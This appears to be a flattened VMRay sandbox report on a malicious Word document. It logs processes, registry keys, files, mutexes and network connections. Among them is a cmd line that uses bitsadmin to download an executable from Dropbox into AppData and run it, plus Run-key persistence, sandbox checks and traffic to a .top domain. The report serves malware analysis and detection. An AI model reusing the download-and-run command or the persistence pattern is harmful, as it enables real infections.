VMRay Analyzer Report for Sample #20911 VMRay Analyzer 2.2.0 Process 1 2388 winword.exe 1412 winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" C:\Users\aETAdzjz\Desktop\ c:\program files\microsoft office\root\office16\winword.exe Child_Of Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 2 2640 cmd.exe 2388 cmd.exe cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\iuoldw.exe &start %appdata%\iuoldw.exe" C:\Users\aETAdzjz\Desktop\ c:\windows\system32\cmd.exe Child_Of Child_Of Child_Of Created Opened Opened Opened Opened Opened Opened Process 3 2668 waitfor.exe 2640 waitfor.exe waitfor /t 5 YKERQ C:\Users\aETAdzjz\Desktop\ c:\windows\system32\waitfor.exe Process 4 2704 bitsadmin.exe 2640 bitsadmin.exe bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe C:\Users\aETAdzjz\Desktop\ c:\windows\system32\bitsadmin.exe Child_Of Wrote_To Opened Opened Connected_To Connected_To Process 5 860 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs C:\Windows\system32\ c:\windows\system32\svchost.exe Child_Of Child_Of Child_Of Process 6 1628 iuoldw.exe 2640 iuoldw.exe C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe C:\Users\aETAdzjz\Desktop\ c:\users\aetadzjz\appdata\roaming\iuoldw.exe Child_Of Child_Of Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Opened Opened Opened Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Created Created Created Created Created Created Created Created 
Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Process 7 1960 roottools.exe 1628 roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" C:\Users\aETAdzjz\AppData\Roaming\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe Child_Of Child_Of Created Created Created Opened Opened Opened Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Process 8 2032 cmd.exe 1628 cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat" C:\Users\aETAdzjz\Desktop\ c:\windows\syswow64\cmd.exe Created Read_From Wrote_To Opened Deleted Opened Opened Opened Process 9 2384 wmiadap.exe 860 wmiadap.exe wmiadap.exe /F /T /R C:\Windows\system32\ c:\windows\system32\wbem\wmiadap.exe Process 10 712 svchost.exe 476 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted C:\Windows\system32\ c:\windows\system32\svchost.exe Process 11 2584 wmiprvse.exe 600 wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding C:\Windows\system32\ c:\windows\system32\wbem\wmiprvse.exe Process 12 1588 svchost.exe 1960 svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs C:\Users\aETAdzjz\AppData\Roaming\ c:\windows\syswow64\svchost.exe Child_Of Created Created Created Created Created Created Created Created Created Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Opened Opened Opened Opened Opened Opened Opened Opened Opened Connected_To Connected_To Connected_To Process 13 1532 svchost.exe 1960 svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs C:\Users\aETAdzjz\AppData\Roaming\ c:\windows\syswow64\svchost.exe Created Created Created Created Created Modified_Properties_Of Modified_Properties_Of Opened Opened Opened Opened Process 14 
1016 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe Process 15 1700 roottools.exe 1392 roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" C:\Windows\system32\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe Child_Of Child_Of Created Created Opened Opened Opened Created Created Created Created Opened Opened Opened Opened Opened Opened Process 16 800 svchost.exe 1700 svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs C:\Windows\system32\ c:\windows\syswow64\svchost.exe Child_Of Child_Of Child_Of Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Process 17 2040 svchost.exe 1700 svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs C:\Windows\system32\ c:\windows\syswow64\svchost.exe Created Created Created Created Created Created Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Opened Opened Opened Opened Opened Process 18 1000 svchost.exe 472 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe Process 19 856 svchost.exe 472 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs 
C:\Windows\system32\ c:\windows\system32\svchost.exe Child_Of Child_Of Child_Of Child_Of Child_Of Process 20 1428 upde25b4796.exe 800 upde25b4796.exe "C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe" C:\Windows\system32\ c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe Child_Of Child_Of Created Created Created Created Created Created Created Created Created Opened Opened Opened Created Created Opened Opened Opened Opened Process 21 1404 wmiprvse.exe 596 wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding C:\Windows\system32\ c:\windows\system32\wbem\wmiprvse.exe Process 22 2024 roottools.exe 1428 roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" C:\Users\aETAdzjz\AppData\Roaming\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe Child_Of Child_Of Created Created Opened Opened Opened Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Process 23 1700 cmd.exe 1428 cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat" C:\Windows\system32\ c:\windows\syswow64\cmd.exe Created Read_From Wrote_To Opened Deleted Opened Opened Opened Process 24 1592 svchost.exe 2024 svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs C:\Users\aETAdzjz\AppData\Roaming\ c:\windows\syswow64\svchost.exe Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created 
Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Process 25 2016 svchost.exe 2024 svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs C:\Users\aETAdzjz\AppData\Roaming\ c:\windows\syswow64\svchost.exe Created Created Created Created Modified_Properties_Of Modified_Properties_Of Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 26 1600 wmiprvse.exe 596 wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding C:\Windows\system32\ c:\windows\system32\wbem\wmiprvse.exe Process 27 708 svchost.exe 472 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted C:\Windows\system32\ c:\windows\system32\svchost.exe Process 28 1404 wmiadap.exe 856 wmiadap.exe wmiadap.exe /F /T /R C:\Windows\system32\ c:\windows\system32\wbem\wmiadap.exe Process 29 1552 wmiprvse.exe 596 wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding C:\Windows\system32\ c:\windows\system32\wbem\wmiprvse.exe WinRegistryKey Licenses HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 HKEY_CLASSES_ROOT WinRegistryKey win64 INVALID WinRegistryKey 
TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 HKEY_CLASSES_ROOT 
WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 HKEY_CLASSES_ROOT WinRegistryKey Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 HKEY_CLASSES_ROOT WinRegistryKey Software\Microsoft\VBA\7.1\Common HKEY_CURRENT_USER RequireDeclaration CompileOnDemand NotifyUserBeforeStateLoss BackGroundCompile BreakOnAllErrors BreakOnServerErrors WinRegistryKey TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 HKEY_CLASSES_ROOT WinRegistryKey TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 HKEY_CLASSES_ROOT File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE File STD_ERROR_HANDLE WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE File STD_INPUT_HANDLE SocketAddress www.dropbox.com 443 NetworkConnection HTTP www.dropbox.com 443 URI https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 Contains URI www.dropbox.com File Users\aETAdzjz\AppData\Roaming\iuoldw.exe Users\aETAdzjz\AppData\Roaming\iuoldw.exe \??\C:\ \??\C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe exe File popupkiller.exe popupkiller.exe c:\ c:\popupkiller.exe exe File stimulator.exe stimulator.exe c:\ c:\stimulator.exe exe File tools\execute.exe tools\execute.exe c:\ c:\tools\execute.exe exe File npf_ndiswanip File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin c:\ 
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin hin MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv ecv MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig rig MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe exe MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\roaming\iuoldw.exe users\aetadzjz\appdata\roaming\iuoldw.exe c:\ c:\users\aetadzjz\appdata\roaming\iuoldw.exe exe File 
Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe \??\C:\ \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe exe File users\aetadzjz\appdata\roaming users\aetadzjz\appdata\roaming c:\ c:\users\aetadzjz\appdata\roaming File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys com\support\flashplayer\sys File users\aetadzjz\appdata\local\temp\updaa5900b0.bat users\aetadzjz\appdata\local\temp\updaa5900b0.bat c:\ c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat bat MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE Mutex Mutex 9B4D68961731FE3C22DA08B640799EB6 Mutex Sandboxie_SingleInstanceMutex_Control Mutex Frz_State Mutex E58EFF540968A436E982FCFA1C0445A2 WinRegistryKey SOFTWARE\Microsoft\VBA\Monitors HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallDate InstallDate InstallDate InstallDate InstallDate WinRegistryKey Software\WINE HKEY_CURRENT_USER WinRegistryKey Software\WINE HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallDate WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE DigitalProductId DigitalProductId DigitalProductId DigitalProductId DigitalProductId WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE DigitalProductId WinRegistryKey SOFTWARE\Microsoft 
HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\GDIPlus HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\MSDAIPP HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\IAM HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\OneDrive HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Direct3D HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Shared HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\IMEJP HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Speech HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Exchange HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Wisp HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Notepad HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\SQMClient HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Keyboard HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\wfs HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\SkyDrive HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Feeds HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Fax HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\FTP HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Kaev HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Lukuip HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Boteun HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER File Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe \??\C:\ \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe exe File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv users\aetadzjz\appdata\roaming\macromedia\flash 
player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv ecv File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE Mutex C2E6ECE9938A43206F172A85684E36DB Mutex CEE48AFA231AB21CA6E2437DB844BAD7 Mutex 1F4C22565107A34AD73CB0F585F8F77C Mutex 9B4D68961731FE3C22DA08B640799EB6 Mutex 20BC29E135FB9B01285187E3B5593CC8 WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna File users\aetadzjz\appdata\local\temp\updaa5900b0.bat users\aetadzjz\appdata\local\temp\updaa5900b0.bat c:\ c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat bat File STD_INPUT_HANDLE File STD_ERROR_HANDLE File STD_OUTPUT_HANDLE File users\aetadzjz\appdata\roaming\iuoldw.exe users\aetadzjz\appdata\roaming\iuoldw.exe c:\ c:\users\aetadzjz\appdata\roaming\iuoldw.exe exe WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv ecv File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin users\aetadzjz\appdata\roaming\macromedia\flash 
player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin hin File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe exe File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig rig Mutex E58EFF540968A436E982FCFA1C0445A2 Mutex B3F6E53F120A5BE5825B9C06159BB3F4 Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex ABC6B5B774FF9FD7F54EC277098C64EE WinRegistryKey Software\Microsoft\Windows\Currentversion\Run HKEY_CURRENT_USER roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" REG_SZ roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" REG_SZ roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" REG_SZ WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER 
Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl SocketAddress aaopsjdf.top 443 NetworkConnection HTTP aaopsjdf.top 443 URI aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw Contains URI None URI aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw Contains File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv ecv Mutex 20BC29E135FB9B01285187E3B5593CC8 Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex B3F6E53F120A5BE5825B9C06159BB3F4 WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl Baywkivyl Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna Omegovna File Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe \??\C:\ 
\??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe exe File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE Mutex 4786CF0F1E6E9E20640CE4A22DFFC997 Mutex 35D65C8FBCA06952705002450D6712FC Mutex 9B4D68961731FE3C22DA08B640799EB6 File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv ecv File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin hin File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe c:\ 